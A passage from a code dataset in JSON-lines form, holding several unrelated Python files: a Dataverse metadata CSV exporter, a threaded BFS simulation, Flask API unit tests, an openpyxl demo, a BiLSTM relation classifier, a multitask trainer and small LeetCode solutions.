ttk.Button(window, text='Browse', command=lambda: retrieve_jsondirectory())\nbutton_getJSONFiles.grid(sticky='w', column=0, row=1)\n\n# Create empty row in grid to improve spacing between the two fields\nwindow.grid_rowconfigure(3, minsize=25)\n\n# Create label for button to browse for directory to add csv files in\nlabel_tablesDirectory = Label(window, text='Choose folder to store the csv files:', anchor='w')\nlabel_tablesDirectory.grid(sticky='w', column=0, row=4, pady=2)\n\n# Create button to browse for directory containing JSON files\nbutton_tablesDirectory = ttk.Button(window, text='Browse', command=lambda: retrieve_csvdirectory())\nbutton_tablesDirectory.grid(sticky='w', column=0, row=5)\n\n# Create start button\nbutton_Start = ttk.Button(window, text='Start', command=lambda: start())\nbutton_Start.grid(sticky='w', column=0, row=7, pady=40)\n\n# Keep window open until it's closed\nmainloop()\n\n\n# Store path of csv file to filename variable\nfilename = os.path.join(csvDirectory, 'terms.csv')\n\nprint('Creating CSV file')\n\nwith open(filename, mode='w') as metadatafile:\n\tmetadatafile = csv.writer(metadatafile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t# Create header row\n\tmetadatafile.writerow([\n\t\t'dataset_id', 'persistentUrl', 'license', 'termsOfUse', 'confidentialityDeclaration',\n\t\t'specialPermissions', 'restrictions', 'citationRequirements', 'depositorRequirements',\n\t\t'conditions', 'disclaimer', 'termsOfAccess', 'dataaccessPlace', 'originalArchive',\n\t\t'availabilityStatus', 'contactForAccess', 'sizeOfCollection', 'studyCompletion'])\n\nprint('Getting metadata:')\n\n\n# Get value of nested key or return nothing if key doesn't exist\ndef improved_get(_dict, path, default=None):\n\tfor key in path.split('.'):\n\t\ttry:\n\t\t\t_dict = _dict[key]\n\t\texcept KeyError:\n\t\t\treturn default\n\treturn _dict\n\n\nfor file in glob.glob(os.path.join(jsonDirectory, '*.json')): # For each JSON file in a folder\n\twith open(file, 'r') as f1: # Open each file in read mode\n\t\tdataset_metadata = f1.read() # Copy content to dataset_metadata variable\n\t\tdataset_metadata = json.loads(dataset_metadata) # Load content in variable as a json object\n\n\t# Save the metadata values in variables\n\tdataset_id = dataset_metadata['data']['id']\n\tpersistentUrl = dataset_metadata['data']['persistentUrl']\n\tlicense = improved_get(dataset_metadata, 'data.latestVersion.license')\n\ttermsOfUse = improved_get(dataset_metadata, 'data.latestVersion.termsOfUse')\n\tconfidentialityDeclaration = improved_get(dataset_metadata, 'data.latestVersion.confidentialityDeclaration')\n\tspecialPermissions = improved_get(dataset_metadata, 'data.latestVersion.specialPermissions')\n\trestrictions = improved_get(dataset_metadata, 'data.latestVersion.restrictions')\n\tcitationRequirements = improved_get(dataset_metadata, 'data.latestVersion.citationRequirements')\n\tdepositorRequirements = improved_get(dataset_metadata, 'data.latestVersion.depositorRequirements')\n\tconditions = improved_get(dataset_metadata, 'data.latestVersion.conditions')\n\tdisclaimer = improved_get(dataset_metadata, 'data.latestVersion.disclaimer')\n\ttermsOfAccess = improved_get(dataset_metadata, 'data.latestVersion.termsOfAccess')\n\tdataaccessPlace = improved_get(dataset_metadata, 'data.latestVersion.dataaccessPlace')\n\toriginalArchive = improved_get(dataset_metadata, 'data.latestVersion.originalArchive')\n\tavailabilityStatus = improved_get(dataset_metadata, 'data.latestVersion.availabilityStatus')\n\tcontactForAccess = improved_get(dataset_metadata, 'data.latestVersion.contactForAccess')\n\tsizeOfCollection = improved_get(dataset_metadata, 'data.latestVersion.sizeOfCollection')\n\tstudyCompletion = improved_get(dataset_metadata, 'data.latestVersion.studyCompletion')\n\n\t# Append fields to the csv file\n\twith open(filename, mode='a') as metadatafile:\n\n\t\t# Convert all characters to utf-8\n\t\tdef to_utf8(lst):\n\t\t\treturn [unicode(elem).encode('utf-8') for elem in lst]\n\n\t\tmetadatafile = csv.writer(metadatafile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n\t\t# Write new row\n\t\tmetadatafile.writerow([\n\t\t\tdataset_id, persistentUrl, license, termsOfUse, confidentialityDeclaration,\n\t\t\tspecialPermissions, restrictions, citationRequirements, depositorRequirements,\n\t\t\tconditions, disclaimer, termsOfAccess, dataaccessPlace, originalArchive,\n\t\t\tavailabilityStatus, contactForAccess, sizeOfCollection, studyCompletion])\n\n\t# As a progress indicator, print a dot each time a row is written\n\tsys.stdout.write('.')\n\tsys.stdout.flush()\nprint('\\n')\n","sub_path":"get-dataverse-metadata/parse_metadata_fields/parse_terms_metadata.py","file_name":"parse_terms_metadata.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"227698804","text":"from queue import Queue\nfrom message import Message\nfrom process import Process\nimport threading\nimport time\nimport sys\nimport json\n\ndef launch_master_thread(n, ids, root, conn_matrix):\n global id_process, id_label\n i=0\n for p_id in ids:\n id_label[p_id] = i\n i += 1\n print(f'In master thread. Launching {n} threads..')\n initial_config = {}\n q = [] #list of communication channels\n for i in range(n):\n q.append(Queue()) #append comm channel for each process\n q.append(Queue()) # last comm channel to communicate with master\n for pid in ids:\n initial_config[int(pid)] = {'parent': None,\n 'children':[],\n 'marked':False,\n 'sent':[],\n 'r':0,\n 'my_index':id_label[int(pid)], #to know which queue belongs to me from the array q\n }\n initial_config['comm']=q\n threadLock = threading.Lock()\n r=1\n cleanup = False\n while True:\n print(f'********** master broadcast {r} ***********')\n if r==1:\n config = initial_config\n latest_q = q[-1]\n print(f'|| BFS LEVEL: {root}')\n r = r+1\n id_process = launch_threads(ids, conn_matrix, root, config)\n config={}\n done_threads=[]\n while True: #wait for all threads to complete one round after the first broadcast\n if len(done_threads) == len(id_process):\n break\n tmp=None\n threadLock.acquire()\n if latest_q.qsize()!=0:\n tmp = latest_q.get()\n threadLock.release()\n if tmp==None:\n continue\n else: #if tmp.receiverID == 'Master':\n config[tmp.senderID] = tmp.msg_type['done_msg'] \n config['comm'] = tmp.msg_type['comm']\n latest_q = tmp.msg_type['comm'][-1]\n done_threads.append(tmp.senderID)\n for v in id_process.values():\n v.join()\n # check termination\n visited = []\n for key in config.keys():\n if key!=\"comm\":\n if config[key]['marked']==True:\n visited.append(key)\n if len(visited)==n:\n if not cleanup:\n cleanup=True\n else:\n break\n print('**********************************************')\n for c in config:\n if c!=\"comm\":\n print(f'{c} : Parent: {config[c][\"parent\"]} Children: {config[c][\"children\"]} Marked: {config[c][\"marked\"]}')\n print('exiting master thread. bye!')\n\ndef launch_threads(ids, conn_matrix, root, config):\n for p_id, conn in zip(ids, conn_matrix):\n process = Process(int(p_id), root, conn, config)\n id_process[p_id] = process \n for v in id_process.values():\n v.start()\n return id_process\n\nif __name__==\"__main__\":\n with open(\"input_basic.dat\",\"r\") as dat_file:\n data = dat_file.readlines()\n n = int(data[0])\n root = int(data[2])\n ids = data[1].strip()[1:-1].split(\",\")\n for i in range(len(ids)): ids[i] = int(ids[i])\n matrix_rows = data[3][2:-3].split(\"],[\")\n connectivity_matrix = []\n for row in matrix_rows:\n connectivity_matrix.append(row.split(\",\"))\n for row in range(len(connectivity_matrix)):\n for j in range(len(connectivity_matrix)):\n connectivity_matrix[row][j] = int(connectivity_matrix[row][j])\n id_process = {}\n id_label = {} \n master_thread = threading.Thread(name='master',target=launch_master_thread, args=(n, ids, root, connectivity_matrix))\n master_thread.start() \n\n\n\n","sub_path":"v5_multichannel/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"156678058","text":"lista = []\n\nfor x in range(0, 101):\n lista.append(x)\n\nprint(lista)\n\n# list comprehension mismo resultado que las intrucciones anteriores\nestructura = [x for x in range(0, 100)]\nprint(estructura)\n\n# tuple comprehension\n# dentro de los comprehension podemos mandar a llamar funciones\nestructura = tuple( (x for x in range(0, 100) if x % 2 == 0) )\nprint(estructura)\n\ndiccionario = { indice:valor for indice, valor in enumerate(estructura) }\nprint(diccionario)","sub_path":"cf_profesional_python/extras/comprehension.py","file_name":"comprehension.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"44422482","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom app import app\nfrom models import setup_db, Artist, Client, Project, db_drop_and_create_all\nfrom config import artist_token, client_token\n\n\n# Creating request headers with 'Authorization' key and access token as value\nartist_auth_header = {\n 'Authorization': artist_token\n}\n\nclient_auth_header = {\n 'Authorization': client_token\n}\n\n\nclass TestCase(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Set up of the test\"\"\"\n self.app = app\n self.client = self.app.test_client\n self.database_name = \"nomadic\"\n self.database_path = \"postgres://{}/{}\".format(\n 'localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n db_drop_and_create_all()\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n# ----------------------------------------------------------------------------#\n# Tests for GET /projects\n# ----------------------------------------------------------------------------#\n def test_get_project_names_unauthorized(self):\n res = self.client().get('/projects')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 401)\n self.assertFalse(data['success'])\n\n def test_get_project_names_artists(self):\n res = self.client().get('/projects', headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertGreater(len(data['projects']), 0)\n\n# ----------------------------------------------------------------------------#\n# Tests for GET /artists\n# ----------------------------------------------------------------------------#\n def test_get_all_artists_unauthorized(self):\n res = self.client().get('/artists')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 401)\n self.assertFalse(data['success'])\n\n def test_get_all_artists_artists(self):\n res = self.client().get('/artists', headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertGreater(len(data['artists']), 0)\n\n\n# ----------------------------------------------------------------------------#\n# Tests for GET /project/\n# ----------------------------------------------------------------------------#\n def test_get_project_detail_404(self):\n res = self.client().get('/projects/10', headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n\n def test_get_project_detail(self):\n res = self.client().get('/projects/1', headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertEqual(data['project'].get('id'), 1)\n\n# ----------------------------------------------------------------------------#\n# Tests for POST /clients\n# ----------------------------------------------------------------------------#\n def test_create_new_client(self):\n client = {\n 'name': 'Nomadic',\n 'description': 'A platfor that connects artists and art projects'\n }\n\n res = self.client().post('/clients', json=client,\n headers=client_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertEqual(data['client'], 'Nomadic')\n\n def test_create_new_client_no_json(self):\n res = self.client().post('/clients', headers=client_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertFalse(data['success'])\n\n def test_create_new_client_by_artist(self):\n client = {\n 'name': 'Udacity',\n 'description': 'An online learning platform'\n }\n\n res = self.client().post('/clients', json=client,\n headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 401)\n self.assertFalse(data['success'])\n\n# ----------------------------------------------------------------------------#\n# Tests for POST /projects\n# ----------------------------------------------------------------------------#\n def test_create_new_project(self):\n\n project = {\n 'name': 'Fyyur office wall painting',\n 'client_id': 1,\n 'description': 'Paint a large wall in the Fyyur office'\n }\n res = self.client().post('/projects', json=project,\n headers=client_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertEqual(data['project'].get('name'),\n 'Fyyur office wall painting')\n\n def test_create_new_project_no_json(self):\n res = self.client().post('/projects', headers=client_auth_header)\n data = json.loads(res.data)\n \n self.assertEqual(res.status_code, 422)\n self.assertFalse(data['success'])\n\n def test_create_new_project_unauthorized(self):\n project = {\n 'name': 'Fyyur office wall painting',\n 'client_id': 1,\n 'description': 'Paint a large wall in the Fyyur office'\n }\n res = self.client().post('/projects', json=project,\n headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 401)\n self.assertFalse(data['success'])\n\n# ----------------------------------------------------------------------------#\n# Tests for POST /artists\n# ----------------------------------------------------------------------------#\n def test_create_new_artist(self):\n\n artist = {\n 'name': 'Veneer',\n 'portfolio_link': 'http://dribble.com'\n }\n res = self.client().post('/artists', json=artist,\n headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertEqual(data['artist'].get('name'),\n 'Veneer')\n\n def test_create_new_artist_no_json(self):\n res = self.client().post('/artists', headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertFalse(data['success'])\n\n def test_create_new_artist_no_portfolio(self):\n artist = {\n 'name': 'Vaneer'\n }\n res = self.client().post('/artists', json=artist,\n headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertFalse(data['success'])\n\n# ----------------------------------------------------------------------------#\n# Tests for PATCH /project/\n# ----------------------------------------------------------------------------#\n def test_edit_project_detail_404(self):\n project_edit = {\n 'name': 'Fyuur webpage background'\n }\n res = self.client().patch('/projects/10', json=project_edit,\n headers=client_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n\n def test_edit_project_deatil(self):\n res = self.client().get('/projects/1', headers=client_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(data['project'].get('name'),\n 'Fyyur website background')\n\n project_edit = {\n 'name': 'Fyyur webpage background'\n }\n \n res = self.client().patch('/projects/1', json=project_edit,\n headers=client_auth_header)\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertEqual(data['project'].get('name'),\n 'Fyyur webpage background')\n\n# ----------------------------------------------------------------------------#\n# Tests for PATCH /project/\n# ----------------------------------------------------------------------------#\n def test_delete_project_unauthorized(self):\n res = self.client().delete('/projects/1', headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 401)\n self.assertFalse(data['success'])\n\n def test_delete_project(self):\n res = self.client().delete('/projects/1', headers=client_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertEqual(data['project'], 'Fyyur website background')\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":9466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"398586716","text":"import argparse\nimport json\nimport logging\nfrom re import sub\n\ndef _read_config(args):\n config_filename = 'ingest.conf'\n config = {}\n\n if args.config is not None:\n config_filename = args.config\n\n logging.info('Reading configuration file (' + config_filename + ') ...')\n\n with open(config_filename, 'r') as config_file:\n for line in config_file.read().splitlines():\n if not line.startswith('#'):\n prop = line.split('=')\n if len(prop) == 2:\n config[prop[0].strip()] = prop[1].strip()\n\n if ('env' in args) and (args.env is not None):\n config['env'] = args.env.upper()\n else:\n config['env'] = 'PUBLIC_AND_ENTERPRISE'\n\n if ('sonar_server' in args) and (args.sonar_server is not None):\n config['sonar_server'] = args.sonar_server\n if ('install_sonar_server' in args) and (args.install_sonar_server is not None):\n config['install_sonar_server'] = args.install_sonar_server\n if ('install_sonar_runner' in args) and (args.install_sonar_server is not None):\n config['install_sonar_runner'] = args.install_sonar_runner\n\n _convert_public_orgs(config)\n _convert_sonar_metrics(config)\n\n return config\n\ndef _write_update(args):\n\n if not args.update:\n file_or_es = 'results.out'\n else:\n file_or_es = args.update\n return file_or_es\n\n\ndef _parse_commandline():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-config', '--config',\n help='the config file to use for the program [default: ingest.conf]')\n\n parser.add_argument('-env', '--env',\n help='the config file to use for the program [default: ingest.conf]')\n\n parser.add_argument('-update', '--update',\n help='dependencies result will either be written to a file or ES will be updated [default: results.out]',\n action='store_true')\n parser.add_argument('-sonar_server', '--sonar_server',\n help='determine to communicate either local or remote sonar server [default: local]',\n action='store_true')\n parser.add_argument('-install_sonar_server', '--install_sonar_server',\n help='determine to install sonar server [default: false]',\n action='store_true')\n parser.add_argument('-install_sonar_runner', '--install_sonar_runner',\n help='determine to install sonar runner [default: false]',\n action='store_true')\n\n return parser.parse_args()\n\n\ndef _convert_public_orgs(config):\n orgs = []\n for org in config['public_orgs'].split(','):\n orgs.append(org.strip())\n config['public_orgs'] = orgs\n\ndef _convert_sonar_metrics(config):\n metrics = []\n for metric in config['sonar_health_metrics'].split(','):\n metrics.append(metric.strip())\n config['sonar_health_metrics'] = metrics\n\ndef main(args):\n config_update = {}\n logging.basicConfig(filename='project_dependency.log', level=logging.INFO)\n config_update['config'] = _read_config(args)\n config_update['update'] = _write_update(args)\n return config_update\n","sub_path":"ingress/github/sonar/configparams.py","file_name":"configparams.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"43993450","text":"import datetime\nfrom openpyxl import Workbook\n\nwb=Workbook()\nws=wb.active\n# set date using a Python datetime\nws['A1']=datetime.datetime(2010,7,10)\nprint(ws['A1'].number_format)\n\n# enable type inerence on a case-by-case basis\nwb.guess_types=True\nws['B1']='3.14%'\nprint(ws['B1'].value)\nprint(ws['B1'].number_format)\nwb.guess_types=False\nprint(ws['B1'].value)\nprint(ws['B1'].number_format)\n\n# using formula\nws['C1']='=SUM(1,1)'\n\n# merge/unmerge cells\nws.merge_cells('A3:D3')\nws.merge_cells('A4:D4')\nws.unmerge_cells('A4:D4')\n# or\nws.merge_cells(start_row=6, start_column=1, end_row=6, end_column=7)\n\n# insert an image\nfrom openpyxl.drawing.image import Image\n\nws['A7']='You should see threelogos below'\nimg=Image('cell.png')\nws.add_image(img,'A1')\n\n# fold\n\nimport openpyxl\nws5=wb.create_sheet()\nws.column_dimensions.group('G','H',hidden=True)\n\nwb.save('3_formula.xlsx')","sub_path":"3_usingNumberFormats.py","file_name":"3_usingNumberFormats.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"406118812","text":"import numpy as np\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pack_padded_sequence\nfrom torch.nn.utils.rnn import pad_packed_sequence\nfrom torch.nn import Parameter\n\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\ntorch.manual_seed(123)\ntorch.cuda.manual_seed(0)\n\nclass BiLSTM(nn.Module):\n def __init__(self, emb, emb_pos, args):\n super(BiLSTM, self).__init__()\n self.num_words = emb.shape[0]\n self.embed_size = emb.shape[1]\n self.num_pos_tags = len(args.pos2idx) + 2 # add one for , one for \n self.hid_size = args.hid\n self.num_layers = args.num_layers\n self.num_classes = len(args.label_to_id)\n self.num_causal = args.num_causal\n self.dropout = args.dropout\n self.attention = args.attention\n self.bert = args.bert_fts\n self.sparse=args.sparse_emb\n \n ### embedding layer\n if self.bert:\n self.embed_size = args.bert_dim\n else:\n self.emb = nn.Embedding(self.num_words, self.embed_size, padding_idx=0, sparse=self.sparse)\n self.emb.weight = Parameter(torch.FloatTensor(emb))\n self.emb.weight.requires_grad = False\n \n ### pos embeddinig -- one-hot vector\n self.emb_pos = nn.Embedding(self.num_pos_tags, self.num_pos_tags, padding_idx=37, sparse=self.sparse)\n self.emb_pos.weight = Parameter(torch.FloatTensor(emb_pos))\n self.emb_pos.weight.requires_grad = args.train_pos_emb\n\n ### RNN layer\n self.lstm = nn.LSTM(self.embed_size+self.num_pos_tags, self.hid_size,\n self.num_layers, bidirectional=True, batch_first=True)\n \n self.usefeature = args.usefeature\n if self.usefeature:\n self.linear1 = nn.Linear(self.hid_size*4+args.n_fts, self.hid_size)\n else:\n self.linear1 = nn.Linear(self.hid_size*4, self.hid_size)\n self.linear2 = nn.Linear(self.hid_size, self.num_classes)\n self.linear_c = nn.Linear(self.hid_size, self.num_causal) \n self.linear_attn = nn.Linear(self.hid_size, self.hid_size)\n\n self.dropout = nn.Dropout(p=args.dropout)\n self.softmax = nn.Softmax(dim=1)\n self.act = nn.Tanh()\n \n def cal_weights(self, tar_vec, all_vec):\n # tar_vec: batch_size * hid_size\n # all_vec: batch_size * sent_len * hid_size\n # output: weights: batch_size * sent_len \n batch_size = all_vec.size()[0]\n sent_len = all_vec.size()[1]\n tar_tensor = tar_vec.unsqueeze(1)\n all_vec = self.linear_attn(all_vec.view(batch_size*sent_len, -1)).view(batch_size, sent_len, -1)\n distance = \"cosine_sim\"\n if distance == \"cosine_sim\":\n sims = torch.nn.functional.cosine_similarity(tar_tensor.repeat(1, sent_len, 1), all_vec, dim = 2)\n attns = self.softmax(sims)\n else:\n sims = tar_tensor.bmm(all_vec.transpose(1, 2)).squeeze(1)\n attns = self.softmax(sims)\n return attns\n\n def attention_weighting(self, ltar_f, ltar_b, rtar_f, rtar_b, out):\n # input: original target hidden vectors\n # output: weighted vectors by attention\n sent_len = out.size()[1]\n batch_size = out.size()[0]\n\n all_f = out[:, :, :self.hid_size]\n all_b = out[:, :, self.hid_size:]\n w_ltar_f = self.cal_weights(ltar_f, all_f).unsqueeze(2)\n w_ltar_b = self.cal_weights(ltar_b, all_b).unsqueeze(2)\n w_rtar_f = self.cal_weights(rtar_f, all_f).unsqueeze(2)\n w_rtar_b = self.cal_weights(rtar_b, all_b).unsqueeze(2)\n # compute weighted sum\n ltar_f = torch.sum(w_ltar_f.repeat(1, 1, self.hid_size) * all_f, dim=1)\n ltar_b = torch.sum(w_ltar_b.repeat(1, 1, self.hid_size) * all_b, dim=1)\n rtar_f = torch.sum(w_rtar_f.repeat(1, 1, self.hid_size) * all_f, dim=1)\n rtar_b = torch.sum(w_rtar_b.repeat(1, 1, self.hid_size) * all_b, dim=1)\n return ltar_f, ltar_b, rtar_f, rtar_b\n\n def forward(self, seq_lens, sent, lidx_start, lidx_end, ridx_start, ridx_end, \n pred_inds=[], flip = False, causal = False, vat=False):\n '''\n sent[0]: the input sentence (represent in index) in shape (batch_size, seq_len)\n sent[1]: the input POS tage (represent in index) in shape (batch_size, seq_len)\n sent[2]: the linguistic features in shape (batch, n_fts)\n seq_lens: the sequence length for each batch e.g.: [8,4,3,...]\n idx_start/end: a batch of index that assign which element to take. [5, 3, 2, 8,...] \n '''\n\n # look up the embedding for sencetences\n # if in VAT training, simply pass in the noisy input\n if vat:\n emb = sent[0]\n elif self.bert:\n emb = self.dropout(sent[0])\n else:\n emb = self.dropout(self.emb(sent[0]))\n \n # create embeddings for pos tags\n pos = self.emb_pos(sent[1])\n # pack and pass to lstm module and then pad again\n inputs = torch.cat((emb, pos), dim=2)\n pack_inputs = pack_padded_sequence(inputs, seq_lens, batch_first=True, enforce_sorted=False)\n self.lstm.flatten_parameters()\n out, _ = self.lstm(pack_inputs)\n out, seq_lens = pad_packed_sequence(out, batch_first=True, padding_value=0.0) # (batch, seq_len, 2*hid_size)\n \n ### obtain hidden vars based on start and end idx \n batch_size = len(seq_lens)\n lidx_e_idx = lidx_end.unsqueeze(1).expand((out.size(0), out.size(2))).unsqueeze(1) # (batch, 1, 2*hid_size)\n ltar_f = torch.gather(out, dim=1, index=lidx_e_idx).squeeze(1)[:,self.hid_size:]\n lidx_s_idx = lidx_start.unsqueeze(1).expand((out.size(0), out.size(2))).unsqueeze(1)\n ltar_b = torch.gather(out, dim=1, index=lidx_s_idx).squeeze(1)[:,:self.hid_size]\n ridx_e_idx = ridx_end.unsqueeze(1).expand((out.size(0), out.size(2))).unsqueeze(1)\n rtar_f = torch.gather(out, dim=1, index=ridx_e_idx).squeeze(1)[:,self.hid_size:]\n ridx_s_idx = ridx_start.unsqueeze(1).expand((out.size(0), out.size(2))).unsqueeze(1)\n rtar_b = torch.gather(out, dim=1, index=ridx_s_idx).squeeze(1)[:,:self.hid_size]\n \n if self.attention:\n ltar_f, ltar_b, rtar_f, rtar_b = self.attention_weighting(ltar_f, ltar_b, rtar_f, rtar_b, out)\n\n if flip:\n tar = self.dropout(torch.cat((rtar_f, rtar_b, ltar_f, ltar_b), dim=1))\n else:\n tar = self.dropout(torch.cat((ltar_f, ltar_b, rtar_f, rtar_b), dim=1))\n\n if self.usefeature:\n out = torch.cat((tar, sent[2]), dim=1)\n else:\n out = tar\n \n # linear prediction\n out = self.linear1(out)\n out = self.act(out)\n out = self.dropout(out)\n # causal relation \n if causal:\n out = self.linear_c(out)\n else:\n out = self.linear2(out)\n prob = self.softmax(out) # batch x num_labels\n return out, prob\n","sub_path":"code/nn_model.py","file_name":"nn_model.py","file_ext":"py","file_size_in_byte":7100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"152732127","text":"#!/usr/bin/env python3\n\nimport sys\nfrom pokemon.game import Game\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n raise Exception('Not enough arguments')\n team_1, team_2 = sys.argv[1:]\n new_game = Game.create_game(team_1, team_2)\n new_game.run()\n","sub_path":"run_simulator.py","file_name":"run_simulator.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"575408911","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nfrom dataset.data_loader import get_loader\nfrom model.dcnet import DeepCollaborationNetwork, MultiTaskCriterion\nfrom trainer.Trainer import Trainer\n\n\nclass MultitaskTrainer(Trainer):\n def __init__(self, batch_size=32, lr=0.01, epoch_lr=None, lr_decay=0.,\n weight_decay=0., n_classes=23, pretrained=True):\n\n super().__init__(batch_size, lr, epoch_lr, lr_decay, weight_decay, n_classes, pretrained)\n\n def create_model(self, model_name):\n criterions = [nn.CrossEntropyLoss(), nn.L1Loss()]\n weights = [1, 0.10]\n self.criterion = MultiTaskCriterion(criterions, weights)\n\n self.net = DeepCollaborationNetwork(model_name, self.dims, pretrained=self.pretrained)\n self.net.cuda()\n\n self.freeze_layers(1)\n\n self.optimizer = optim.Adam(self._get_parameters(), lr=self.start_lr, weight_decay=self.weight_decay)\n\n def freeze_layers(self, n):\n for column in self.net.columns:\n for i in range(n):\n for param in column[i].parameters():\n param.requires_grad = False\n\n def get_loader(self, folder):\n loader, _ = get_loader(folder['train']['files'], folder['train']['labels'], self.batch_size)\n loader.dataset.set_multitask()\n return loader\n\n def create_mini_batch(self, batch_loader):\n batch = next(batch_loader)[1]\n final_targets = [Variable(batch[1].type(torch.LongTensor)).cuda(),\n Variable(batch[2].type(torch.FloatTensor)).cuda()]\n return Variable(batch[0]).cuda(), final_targets\n\n def get_class_predictions(self, output, targets):\n return output[0].max(1)[1].type_as(targets[0])\n\n def update_iteration_info(self, batch_input, output, targets, epoch_acc, loader, loss, j, print_info=True):\n batch_size = batch_input.size(0)\n predictions = self.get_class_predictions(output, targets)\n correct = predictions.eq(targets[0])\n if not hasattr(correct, 'sum'):\n correct = correct.cpu()\n correct = correct.sum()\n acc = 100. * correct.data.item() / batch_size\n epoch_acc.append(acc)\n if print_info:\n print('\\r', end='')\n print('{} / {} - {:.4f} - {:.2f}%'.format(j + 1, len(loader), loss.data.item(), acc), end='',\n flush=True)\n\n return epoch_acc","sub_path":"src/trainer/MultitaskTrainer.py","file_name":"MultitaskTrainer.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"282388160","text":"# -*- coding: utf-8 -*-\n\n#\n# 你现在是棒球比赛记录员。\n# 给定一个字符串列表,每个字符串可以是以下四种类型之一:\n# 1.整数(一轮的得分):直接表示您在本轮中获得的积分数。\n# 2. \"+\"(一轮的得分):表示本轮获得的得分是前两轮有效 回合得分的总和。\n# 3. \"D\"(一轮的得分):表示本轮获得的得分是前一轮有效 回合得分的两倍。\n# 4. \"C\"(一个操作,这不是一个回合的分数):表示您获得的最后一个有效 回合的分数是无效的,应该被移除。\n#\n# 每一轮的操作都是永久性的,可能会对前一轮和后一轮产生影响。\n# 你需要返回你在所有回合中得分的总和。\n\nclass Solution(object):\n\tdef calPoints(self, ops):\n\t\t\"\"\"\n\t\t:type ops: List[str]\n\t\t:rtype: int\n\t\t\"\"\"\n\t\tarr = []\n\t\tfor o in ops:\n\t\t\tif o == \"C\":\n\t\t\t\tarr.pop()\n\t\t\telif o == \"D\":\n\t\t\t\tn = len(arr)\n\t\t\t\tif n:\n\t\t\t\t\tlast_point = arr[n-1]\n\t\t\t\t\tarr.append(last_point * 2)\n\t\t\telif o == \"+\":\n\t\t\t\tn = len(arr)\n\t\t\t\tif n > 1:\n\t\t\t\t\tarr.append(arr[-1] + arr[-2])\n\t\t\telse:\n\t\t\t\tarr.append(int(o))\n\t\treturn sum(arr)\n\n\nif __name__ == \"__main__\":\n\tnums1 = [\"5\", \"-2\", \"4\", \"C\", \"D\", \"9\", \"+\", \"+\"]\n\ta = Solution().calPoints(nums1)\n\tprint(a)\n","sub_path":"stack/easy/q05.py","file_name":"q05.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"373475309","text":"from bisect import bisect_left\n\nclass Solution:\n def searchMatrix(self, matrix, target):\n \"\"\"\n 